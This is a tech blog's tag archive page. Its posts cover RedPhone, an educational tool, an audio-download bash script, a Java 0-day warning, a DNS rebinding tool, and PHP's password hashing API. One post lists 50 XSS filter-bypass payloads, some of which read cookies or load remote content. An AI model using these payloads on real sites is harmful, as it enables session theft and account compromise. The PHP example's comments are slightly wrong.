Showing posts with label web. Show all posts
Showing posts with label web. Show all posts

Thursday 7 March 2013

Make An Encrypted Call On Android Using RedPhone

If you are quite worried about your privacy while making voice calls on your phone, RedPhone is a perfect tool to install in your android phone. RedPhone ensures that the eavesdropping attackers can not sniff your call by providing end-to-end encryption.

RedPhone is an open source communication encryption android software that well-integrates with the system dialer and lets you use the default system dialer and contacts apps to make calls as you normally would. The tool is written by Maxie Morlinspike, the same guy who wrote a famous tool called SSLStrip for performing HTTPS stripping attacks.

Install RedPhone





It is an open source tool licensed under GPL v3; the github README says, RedPhone is an application that enables encrypted voice communication between RedPhone users. RedPhone integrates with the system dialer to provide a frictionless call experience, but uses ZRTP to setup an encrypted VoIP channel for the actual call. RedPhone was designed specifically for mobile devices, using audio codecs and buffer algorithms tuned to the characteristics of mobile networks, and using push notifications to maximally preserve your device's battery life while still remaining responsive.

If you wish to understand more on Encryption protocol, you should refer to the WIKI.

Install RedPhone




Read more...

E-Paath - A Perfect Computer-based Learning Tool For Your Children

If you are looking for good computer based learning materials for your small children, e-paaath (E-/Online Lesson) is a perfect choice esp. for the Nepali education scenario. I don't know how much has been done to take this software to the reach of the students/children but I think this software can be a very useful interactive learning material for children.

Developed by OLE Nepal in collaboration with the Department of Education (Nepal), this web-based software provides several modules of online lessons for classes 2-6. The software consists of 18-30 lessons organized in a weekly fashion for four subjects: Nepali, English, Mathematics, and Science. The contents for science are available in both English and Nepali languages. However, mathematics is available only in Nepali language.



E-paath is a flash based content and hence requires flash player and can be run through any of the major web browsers such as Mozilla Firefox, Google Chrome, etc. Since e-paath is a web based content, you can run it in any platform without any problem (I had to change a little bit of code in karma.html file to run the tool smoothly in Linux but its still fine; having a web server to serve the pages solves all errors though).

You can download e-paath from HERE. For installation help, you can refer to this page. You can also access the software online from HERE. Btw, there is no specifically linux version of tool available in the website (except for Sugar desktop environment) and don't try to mirror the online version of e-paath as flash contents seem to be internally referencing the configuration files. Your best bet is to download either of the two available versions and then delete all the unnecessary stuffs in there. It just runs fine.


Read more...

Tuesday 29 January 2013

Swasthani.com Swasthani Ripper

Yesterday I came to know that I can listen Swasthani online at this site, www.swasthani.com and I decided to write a swasthani audio downloader. Since it would be useful for everyone, here is the script.

From the site itself, Sri Swasthani Brata Katha is a very popular ritual observed in Nepal in the Poush month (January – February) during winter. Goddess Sri Swasthani, known to grant wishes of her devotees, is worshipped for the whole month of Poush. The Swasthani Brat Katha (story) is recited everyday. The month long telling of the tales are dedicated to the Goddess and the stories that are mainly narrated are those of Swasthani Devi, Lord Shiva and other Gods.

#!/bin/bash
###############################################
# Swasthani.com Swasthani Ripper       #
# Samar @ http://www.techgaun.com       #
###############################################
if [[ ! -f /tmp/swasthani.txt ]]
then
 wget http://www.swasthani.com/ -O - | egrep '<li class="leaf( first| last)?"><a href="/swasthani/' | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' | sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' > /tmp/swasthani.txt
fi

while read -r line
do
 wget "http://www.swasthani.com$line" -O - | egrep 'data="soundFile=http://www.swasthani.com/system/files/' | cut -d\" -f6 | cut -d= -f2 | wget -nc -i -
done </tmp/swasthani.txt


Save the above file as swasthani, then chmod for executable permission and run it. If you have problem copying above code, you can check the Swasthani Downloader at GitHub. Enjoy listening Swasthani, geeks :)


Read more...

Friday 11 January 2013

Java 0-day In The Wild - Disable Java Plugin NOW

Security researchers have discovered yet another critical Java 0-day exploit being used by majority of the browser exploit packs such as Blackhole and Cool. Users are urged to DISABLE the Java plugin RIGHT NOW.

French researcher Kaffeine discovered that the java 0-day has been spotted to be making big hits daily, in a blog post. This particular exploit has proven to be very serious threat for the users. The folks at AlienVault Lab have also reproduced the exploit and it seems to work over all the java versions across all platforms which is a very serious threat.

As for now, the users are highly urged to disable their JAVA plugins right now so that they do not get hit by these 0-days.

So what are you waiting for?

Important links:


How To Disable Java Plugin

Kaffeine's blog post

Alien Vault Labs Post


Read more...

Thursday 27 December 2012

The Scale Of Universe [A Must Watch]

Well this is so absofuckingly awesome that I decided it is worth making post about this particular site. Without further delay, I present you this awesome link

Scale of Universe


I hope you loved the site like I did :)




Read more...

Saturday 8 December 2012

DNS Rebinding Attack Using Rebind

Rebind is a tool that implements the multiple A record DNS rebinding attack. Although this tool was originally written to target home routers, it can be used to target any public (non RFC1918) IP address.

Rebind provides an external attacker access to a target router's internal Web interface. This tool works on routers that implement the weak end system model in their IP stack, have specifically configured firewall rules, and who bind their Web service to the router's WAN interface. Note that remote administration does not need to be enabled for this attack to work. All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by the attacker.



Important Links


Download rebind

Tested Routers (Affected + Not affected)

Rebind FAQ

Defcon Slides



Kind of interesting vector and I guess many are vulnerable out there.


Read more...

Monday 19 November 2012

50 Awesome XSS Vectors From @soaj1664ashar

Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. Can be quite useful for bypassing any filter with the help of these full baked vectors.

50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)

1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
 
2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
 
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
 
4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
 
5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
 
7) <var onmouseover="prompt(1)">On Mouse Over</var>
 
8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
 
9) <img src="/" =_=" title="onerror='prompt(1)'">
 
10) <%<!--'%><script>alert(1);</script -->
 
11) <script src="data:text/javascript,alert(1)"></script>
 
12) <iframe/src \/\/onload = prompt(1)
 
13) <iframe/onreadystatechange=alert(1)
 
14) <svg/onload=alert(1)
 
15) <input value=<><iframe/src=javascript:confirm(1)
 
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
 
17) http://www.<script>alert(1)</script .com
 
 
18) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
 
19) <svg><script ?>alert(1)
 
20) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
 
21) <img src=`xx:xx`onerror=alert(1)>
 
22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
 
23) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
 
24) <math><a xlink:href="//jsfiddle.net/t846h/">click
 
25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
 
26) <svg contentScriptType=text/vbs><script>MsgBox+1
 
27) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
 
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
 
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
 
30) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
 
31) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
 
32) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
 
33) <script>+-+-1-+-+alert(1)</script>
 
34) <body/onload=&lt;!--&gt;&#10alert(1)>
 
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
 
36) <img src ?itworksonchrome?\/onerror = alert(1)
 
37) <svg><script>//&NewLine;confirm(1);</script </svg>
 
38) <svg><script onlypossibleinopera:-)> alert(1)
 
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
 
40) <script x> alert(1) </script 1=2
 
41) <div/onmouseover='alert(1)'> style="x:">
 
42)  <--`<img/src=` onerror=alert(1)> --!>
 
43) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
 
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
 
45) "><img src=x onerror=window.open('https://www.google.com/');>
 
46) <form><button formaction=javascript&colon;alert(1)>CLICKME
 
47) <math><a xlink:href="//jsfiddle.net/t846h/">click
 
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
 
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
 
50) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>


Or Grab from pastebin :)


Read more...

PHP 5.5 To Include Simple And Secure Password Hashing API

Few days ago, we saw the release of PHP 5.5.0 Alpha 1 to the public. The PHP development team is serious about addressing all the criticism it gets time and again. With the recent leaks of several high profile sites, a simple to use yet secure password hashing API has been introduced now.

Here's the RFC for simple password hashing API proposed by ircmaxell and now it has been implemented as a PHP core in 5.5.0 Alpha 1 release and will continue to be part of the PHP core in future releases.

In case you would like to use the API functions in older releases, there's a compatible PHP library for PHP >= 5.3.7. The reason for this is that PHP prior to 5.3.7 contains a security issue with its BCRYPT implementation.



Basically the idea behind simple password hashing API is that most of the PHP developers either don't understand or don't think worth the effort the whole concept of strong password hashing. By providing a simple API that can be called, which takes care of all of those issues for you, hopefully more projects and developers will be able to use secure password hashing.

Using the API is quite simple. All you have to do to get the hash is:

$hash = password_hash($password, PASSWORD_BCRYPT);


Verifying the password is also quite simple.

if (password_verify($password, $hash)) {
    // pass is correct :)
} else {
    // pass is correct :/
}


The simple password hashing API provides sets of password_* functions for the developers to make use of strong password hashing.

Reading materials



RFC for simple password hashing API

Designing an API

PHP 5.5.0 Alpha 1 released


Read more...